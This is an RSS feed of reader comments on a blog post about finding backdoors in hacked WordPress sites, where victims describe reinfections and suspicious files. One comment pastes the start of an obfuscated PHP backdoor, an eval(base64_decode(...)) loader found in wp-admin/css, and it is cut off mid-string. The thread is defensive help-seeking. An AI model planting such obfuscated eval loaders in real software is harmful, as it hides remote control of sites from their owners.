<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	
	xmlns:media="http://search.yahoo.com/mrss/"
		>
<channel>
	<title>Comments on: How to find a backdoor in a hacked WordPress</title>
	<atom:link href="http://ottopress.com/2009/hacked-wordpress-backdoors/feed/" rel="self" type="application/rss+xml" />
	<link>http://ottopress.com/2009/hacked-wordpress-backdoors/</link>
	<description>You have to use an Ottopress to get fresh squeezed Otto.</description>
	<lastBuildDate>Sat, 04 Feb 2012 02:29:19 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Tony Payne</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-10472</link>
		<dc:creator>Tony Payne</dc:creator>
		<pubDate>Mon, 30 Jan 2012 14:29:41 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-10472</guid>
		<description>Same problem here in the last week Rob.  All my web sites (12), both Wordpress and HTML hard coded got hacked with what is probably the same Bot.

I identified the files that contained the &quot;base64_decode&quot; text and script, edited them using Filezilla, thought I had all but one site back up, and now they are all infected again.

I purchased a new hosting account with a different company in October and haven&#039;t yet transferred the domains across.  This seems like a good time to do so, and hopefully I can salvage the many posts that I have written.

This is so extremely frustrating and time consuming, and you can&#039;t just fix things until you know exactly what is wrong, and how to prevent it from happening again.</description>
		<content:encoded><![CDATA[<p>Same problem here in the last week Rob.  All my web sites (12), both WordPress and HTML hard coded got hacked with what is probably the same Bot.</p>
<p>I identified the files that contained the &#8220;base64_decode&#8221; text and script, edited them using Filezilla, thought I had all but one site back up, and now they are all infected again.</p>
<p>I purchased a new hosting account with a different company in October and haven&#8217;t yet transferred the domains across.  This seems like a good time to do so, and hopefully I can salvage the many posts that I have written.</p>
<p>This is so extremely frustrating and time consuming, and you can&#8217;t just fix things until you know exactly what is wrong, and how to prevent it from happening again.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: My final Wordpress security solution</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-10232</link>
		<dc:creator>My final Wordpress security solution</dc:creator>
		<pubDate>Tue, 06 Dec 2011 10:35:42 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-10232</guid>
		<description>[...] http://ottopress.com/2009/hacked-wordpress-backdoors/ [...]</description>
		<content:encoded><![CDATA[<p>[...] <a href="http://ottopress.com/2009/hacked-wordpress-backdoors/" rel="nofollow">http://ottopress.com/2009/hacked-wordpress-backdoors/</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: lajme</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-10171</link>
		<dc:creator>lajme</dc:creator>
		<pubDate>Mon, 21 Nov 2011 18:00:36 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-10171</guid>
		<description>Cleaning a 3 GB space in my host is killing me, and i can not find the source of infection for 3 weeks. Damn. Thank you for the post, now i have few more places to look :)</description>
		<content:encoded><![CDATA[<p>Cleaning a 3 GB space in my host is killing me, and i can not find the source of infection for 3 weeks. Damn. Thank you for the post, now i have few more places to look <img src='http://ottopress.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Sécuriser Wordpress, Cpanel et WHM.</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-10107</link>
		<dc:creator>Sécuriser Wordpress, Cpanel et WHM.</dc:creator>
		<pubDate>Mon, 07 Nov 2011 11:23:11 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-10107</guid>
		<description>[...] WordPress : 6 stratégies pour rester serein10 WordPress security tips that could save your sitehttp://ottopress.com/2009/hacked-wordpress-backdoorshttp://wordpress.org/support/topic/wp-blog-hacked-ksa-userC&#8217;est comme les accidents de la [...]</description>
		<content:encoded><![CDATA[<p>[...] WordPress : 6 stratégies pour rester serein10 WordPress security tips that could save your sitehttp://ottopress.com/2009/hacked-wordpress-backdoorshttp://wordpress.org/support/topic/wp-blog-hacked-ksa-userC&#8217;est comme les accidents de la [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Peter</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-9938</link>
		<dc:creator>Peter</dc:creator>
		<pubDate>Tue, 11 Oct 2011 00:34:40 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-9938</guid>
		<description>Hi Otto,
I have found a suspicious file that is a jquery.js file in the wp-includes/js folder and it contains a large array of numbers with none of the usual header comments about the author etc.  The normal location for jquery.js is in the wp-includes/js/jquery

My concern is that it seems to have been brought in by something like a plugin but I need to work out where it came from?  I have not been able to find it in any of the plugin files downloaded and installed so I am assuming it has been generated by an installation.  The puzzle is that we use Wordpress File Monitor that logs all changed and added files, but there is no record of it being added.  If it was generated by a plugin it should have shown on file monitor as an added file?

I would appreciate any suggestions you have.
Kind regards, Peter</description>
		<content:encoded><![CDATA[<p>Hi Otto,<br />
I have found a suspicious file that is a jquery.js file in the wp-includes/js folder and it contains a large array of numbers with none of the usual header comments about the author etc.  The normal location for jquery.js is in the wp-includes/js/jquery</p>
<p>My concern is that it seems to have been brought in by something like a plugin but I need to work out where it came from?  I have not been able to find it in any of the plugin files downloaded and installed so I am assuming it has been generated by an installation.  The puzzle is that we use WordPress File Monitor that logs all changed and added files, but there is no record of it being added.  If it was generated by a plugin it should have shown on file monitor as an added file?</p>
<p>I would appreciate any suggestions you have.<br />
Kind regards, Peter</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: otto maniani</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-9775</link>
		<dc:creator>otto maniani</dc:creator>
		<pubDate>Sun, 25 Sep 2011 12:46:23 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-9775</guid>
		<description>hi,
my wordpress site got hacked too, i don&#039;t know how to repair it, because i&#039;m not a programmer which can understand piece of coding. my site ramsite.info got hacked till now, and i cant resolve it even i reset my wp instalation.. :(</description>
		<content:encoded><![CDATA[<p>hi,<br />
my wordpress site got hacked too, i don&#8217;t know how to repair it, because i&#8217;m not a programmer which can understand piece of coding. my site ramsite.info got hacked till now, and i cant resolve it even i reset my wp instalation.. <img src='http://ottopress.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Kim</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-9767</link>
		<dc:creator>Kim</dc:creator>
		<pubDate>Fri, 23 Sep 2011 09:16:45 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-9767</guid>
		<description>So this is probably dodgy?  My site was hacked by the Saudi Arabia hacker last night.  This is in the wp-admin/css folder and is called system-in.php.  Here is the first bit of the file. I&#039;m thinking they got into my google account, and I have all my log ins and passwords in a shared file in google docs.  Will remove it now :P)

&lt;?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=59080;eval((base64_decode(&#039;JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0</description>
		<content:encoded><![CDATA[<p>So this is probably dodgy?  My site was hacked by the Saudi Arabia hacker last night.  This is in the wp-admin/css folder and is called system-in.php.  Here is the first bit of the file. I&#8217;m thinking they got into my google account, and I have all my log ins and passwords in a shared file in google docs.  Will remove it now <img src='http://ottopress.com/wp-includes/images/smilies/icon_razz.gif' alt=':P' class='wp-smiley' /> )</p>
<p>&lt;?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.<br />
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000=59080;eval((base64_decode(&#039;JE8wMDBPME8wMD1mb3BlbigkT09PME8wTzAwLCdyYicpO3doaWxlKC0</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Samuel B on &#34;feed is hacked how to fix it&#34; &#124; Upgrade Wordpress Now</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-9744</link>
		<dc:creator>Samuel B on &#34;feed is hacked how to fix it&#34; &#124; Upgrade Wordpress Now</dc:creator>
		<pubDate>Tue, 20 Sep 2011 17:31:35 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-9744</guid>
		<description>[...] http://ottopress.com/2009/hacked-wordpress-backdoors/ [...]</description>
		<content:encoded><![CDATA[<p>[...] <a href="http://ottopress.com/2009/hacked-wordpress-backdoors/" rel="nofollow">http://ottopress.com/2009/hacked-wordpress-backdoors/</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: How was my WP site hacked &#124; SeekPHP.com</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-9462</link>
		<dc:creator>How was my WP site hacked &#124; SeekPHP.com</dc:creator>
		<pubDate>Fri, 19 Aug 2011 15:31:59 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-9462</guid>
		<description>[...] Then take a look at these links:http://ottopress.com/2009/hacked-wordpress-backdoors/http://wordpress.org/support/topic/268083#post-1065779http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ [...]</description>
		<content:encoded><![CDATA[<p>[...] Then take a look at these links:<a href="http://ottopress.com/2009/hacked-wordpress-backdoors/http://wordpress.org/support/topic/268083#post-1065779http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/" rel="nofollow">http://ottopress.com/2009/hacked-wordpress-backdoors/http://wordpress.org/support/topic/268083#post-1065779http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/</a> [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Rob Venter</title>
		<link>http://ottopress.com/2009/hacked-wordpress-backdoors/comment-page-1/#comment-9101</link>
		<dc:creator>Rob Venter</dc:creator>
		<pubDate>Fri, 08 Jul 2011 12:56:01 +0000</pubDate>
		<guid isPermaLink="false">http://ottopress.com/?p=41#comment-9101</guid>
		<description>I have the same “eval(base64_decode” as Cecilia Tan. It runs on my index.php file inside the main wordpress folder and it also runs on the copy of that index.php in my site&#039;s root folder. 

All the wordpress sites on my hosting account have been hacked. There are about 10 websites. I scanned my harddrive, deleted all ftp software, changed all passwords including my cpanel password, ftp, and wordpress passwords. I even deleted some of the websites and databases. But the code reappeared when I created brandnew databases and reuploaded the websites on fresh wp installs. (I reuploaded my themes folder).

I&#039;m sure this means that there&#039;s a backdoor in my wp-content folder, possibly my themes folder. Only thing is, I can&#039;t find it.

The thing is, if I register a new domain in my hosting account and install wordpress (manually or via cpanel) I can guarantee I will have the same thing happen within 24 hours. I&#039;ve done this a few times lately.

What do I do?

Thanks so much.
Rob</description>
		<content:encoded><![CDATA[<p>I have the same “eval(base64_decode” as Cecilia Tan. It runs on my index.php file inside the main wordpress folder and it also runs on the copy of that index.php in my site&#8217;s root folder. </p>
<p>All the wordpress sites on my hosting account have been hacked. There are about 10 websites. I scanned my harddrive, deleted all ftp software, changed all passwords including my cpanel password, ftp, and wordpress passwords. I even deleted some of the websites and databases. But the code reappeared when I created brandnew databases and reuploaded the websites on fresh wp installs. (I reuploaded my themes folder).</p>
<p>I&#8217;m sure this means that there&#8217;s a backdoor in my wp-content folder, possibly my themes folder. Only thing is, I can&#8217;t find it.</p>
<p>The thing is, if I register a new domain in my hosting account and install wordpress (manually or via cpanel) I can guarantee I will have the same thing happen within 24 hours. I&#8217;ve done this a few times lately.</p>
<p>What do I do?</p>
<p>Thanks so much.<br />
Rob</p>
]]></content:encoded>
	</item>
</channel>
</rss>

<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Page Caching using xcache
Object Caching 355/361 objects using xcache

Served from: ottodestruct.com @ 2012-02-04 06:38:53 -->
